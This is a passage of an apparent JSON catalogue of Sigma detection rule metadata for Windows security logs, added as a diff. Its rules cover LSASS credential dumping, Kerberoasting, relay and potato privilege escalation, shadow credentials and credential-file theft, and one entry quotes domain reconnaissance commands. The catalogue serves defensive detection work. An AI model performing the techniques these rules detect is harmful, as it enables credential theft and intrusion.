"attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", + "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM" + }, + { + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/19", + "falsepositive": [ + "User using a disabled account" + ], + "filename": "win_security_susp_failed_logon_reasons.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://twitter.com/SBousseaden/status/1101431884540710913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "value": "Account Tampering - Suspicious Failed Logon Reasons" + }, + { + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "meta": { + "author": "NVISO", + "creation_date": "2020/05/06", + "falsepositive": [ + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" + ], + "filename": "win_security_susp_failed_logon_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" + ] + }, + "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "value": "Failed Logon From Public IP" + }, + { + "description": "Detects a source system failing to authenticate against a remote host with multiple users.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_remote_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", + "value": "Multiple Users Remotely Failing To Authenticate From Single Source" + }, + { + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/10", + "falsepositive": [ + "Faulty legacy applications" + ], + "filename": "win_security_susp_kerberos_manipulation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", + "value": "Kerberos Manipulation" + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "meta": { + "author": "@SBousseaden, Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_krbrelayup.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", + "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "value": "KrbRelayUp Attack Pattern" + }, + { + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "meta": { + "author": "xknow @xknow_infosec", + "creation_date": "2019/03/24", + "falsepositive": [ + "Companies, who may use these default LDAP-Attributes for personal information" + ], + "filename": "win_security_susp_ldap_dataexchange.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ] + }, + "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "value": "Suspicious LDAP-Attributes Used" + }, + { + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_local_anon_logon_created.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1189469425482829824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" + ] + }, + "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" + }, + { + "description": "Detects suspicious processes logging on with explicit credentials", + "meta": { + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrators that use the RunAS command or scheduled tasks" + ], + "filename": "win_security_susp_logon_explicit_credentials.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" + ], + "tags": [ + "attack.t1078", + "attack.lateral_movement" + ] + }, + "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "value": "Suspicious Remote Logon with Explicit Credentials" + }, + { + "description": "Detects logon events that specify new credentials", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Legitimate remote administration activity" + ], + "filename": "win_security_susp_logon_newcredentials.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" + ], + "tags": "No established tags" + }, + "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "value": "Outgoing Logon with New Credentials" + }, + { + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "meta": { + "author": "sigma", + "creation_date": "2017/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_lsass_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jackcr/status/807385668833968128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "value": "Password Dumper Activity on LSASS" + }, + { + "description": "Detects process handle on LSASS process with certain access mask", + "meta": { + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + ], + "filename": "win_security_susp_lsass_dump_generic.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" + ], + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ] + }, + "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "value": "Generic Password Dumper Activity on LSASS" + }, + { + "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", + "meta": { + "author": "Vasiliy Burov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Software uninstallation", + "Files restore activities" + ], + "filename": "win_security_susp_multiple_files_renamed_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", + "value": "Suspicious Multiple File Rename Or Delete Occurred" + }, + { + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "meta": { + "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "creation_date": "2017/03/07", + "falsepositive": [ + "Administrator activity" + ], + "filename": "win_security_susp_net_recon_activity.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" + ] + }, + "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "value": "Reconnaissance Activity" + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" + ], + "tags": "No established tags" + }, + "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", + "value": "Password Protected ZIP File Opened" + }, + { + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip_filename.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" + ], + "tags": "No established tags" + }, + "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", + "value": "Password Protected ZIP File Opened (Suspicious Filenames)" + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" + ], + "tags": "No established tags" + }, + "uuid": "571498c8-908e-40b4-910b-d2369159a3da", + "value": "Password Protected ZIP File Opened (Email Attachment)" + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Other browsers" + ], + "filename": "win_security_susp_outbound_kerberos_connection.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ] + }, + "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "value": "Suspicious Outbound Kerberos Connection - Security" + }, + { + "description": "Detects possible addition of shadow credentials to an active directory object.", + "meta": { + "author": "Nasreddine Bencherchali (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + ], + "filename": "win_security_susp_possible_shadow_credentials_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", + "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", + "https://twitter.com/SBousseaden/status/1581300963650187264?", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556" + ] + }, + "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", + "value": "Possible Shadow Credentials Added" + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "value": "Suspicious PsExec Execution" + }, + { + "description": "Detects known sensitive file extensions accessed on a network share", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "filename": "win_security_susp_raccess_sensitive_fext.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection", + "attack.t1039" + ] + }, + "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", + "value": "Suspicious Access to Sensitive File Extensions" + }, + { + "description": "Detects service ticket requests using RC4 encryption type", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/06", + "falsepositive": [ + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" + ], + "filename": "win_security_susp_rc4_kerberos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=3458", + "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "value": "Suspicious Kerberos RC4 Ticket Encryption" + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "meta": { + "author": "@SBousseaden, Florian Roth", + "creation_date": "2019/11/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_rottenpotato.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1195284233729777665", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" + ] + }, + "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "value": "RottenPotato Like Attack Pattern" + }, + { + "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/06/09", + "falsepositive": "No established falsepositives", + "filename": "win_security_susp_samr_pwset.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", + "value": "Possible Remote Password Change Through SAMR" + }, + { + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "value": "Suspicious Scheduled Task Creation" + }, + { + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_delete.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "value": "Important Scheduled Task Deleted/Disabled" + }, + { + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_update.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "value": "Suspicious Scheduled Task Update" + }, + { + "description": "Detects renaming of file while deletion with SDelete tool.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/14", + "falsepositive": [ + "Legitimate usage of SDelete" + ], + "filename": "win_security_susp_sdelete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" + ] + }, + "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "value": "Secure Deletion with SDelete" + }, + { + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "meta": { + "author": "@neu5ron", + "creation_date": "2019/02/05", + "falsepositive": [ + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + ], + "filename": "win_security_susp_time_modification.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "Live environment caused by malware", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "value": "Unauthorized System Time Modification" + }, + { + "description": "Detection of logins performed with WMI", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/04", + "falsepositive": [ + "Monitoring tools", + "Legitimate system administration" + ], + "filename": "win_security_susp_wmi_login.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", + "value": "Login with WMI" + }, + { + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_svcctl_remote_service.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" + ] + }, + "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "value": "Remote Service Activity via SVCCTL Named Pipe" + }, + { + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_syskey_registry_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "value": "SysKey Registry Keys Access" + }, + { + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_sysmon_channel_reference_deletion.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://twitter.com/SecurityJosh/status/1283027365770276866", + "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", + "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "value": "Sysmon Channel Reference Deletion" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "win_security_tap_driver_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", + "value": "Tap Driver Installation - Security" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_teams_suspicious_objectaccess.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "value": "Suspicious Teams Application Related ObjectAcess Event" + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Transferring sensitive files for legitimate administration work by legitimate administrator" + ], + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ] + }, + "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", + "value": "Transferring Files with Credential Data via Network Shares" + }, + { + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/14", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_user_added_to_local_administrators.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", + "value": "User Added to Local Administrators" + }, + { + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "meta": { + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ] + }, + "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'" + }, + { + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/18", + "falsepositive": [ + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" + ], + "filename": "win_security_user_creation.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "value": "Local User Creation" + }, + { + "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude 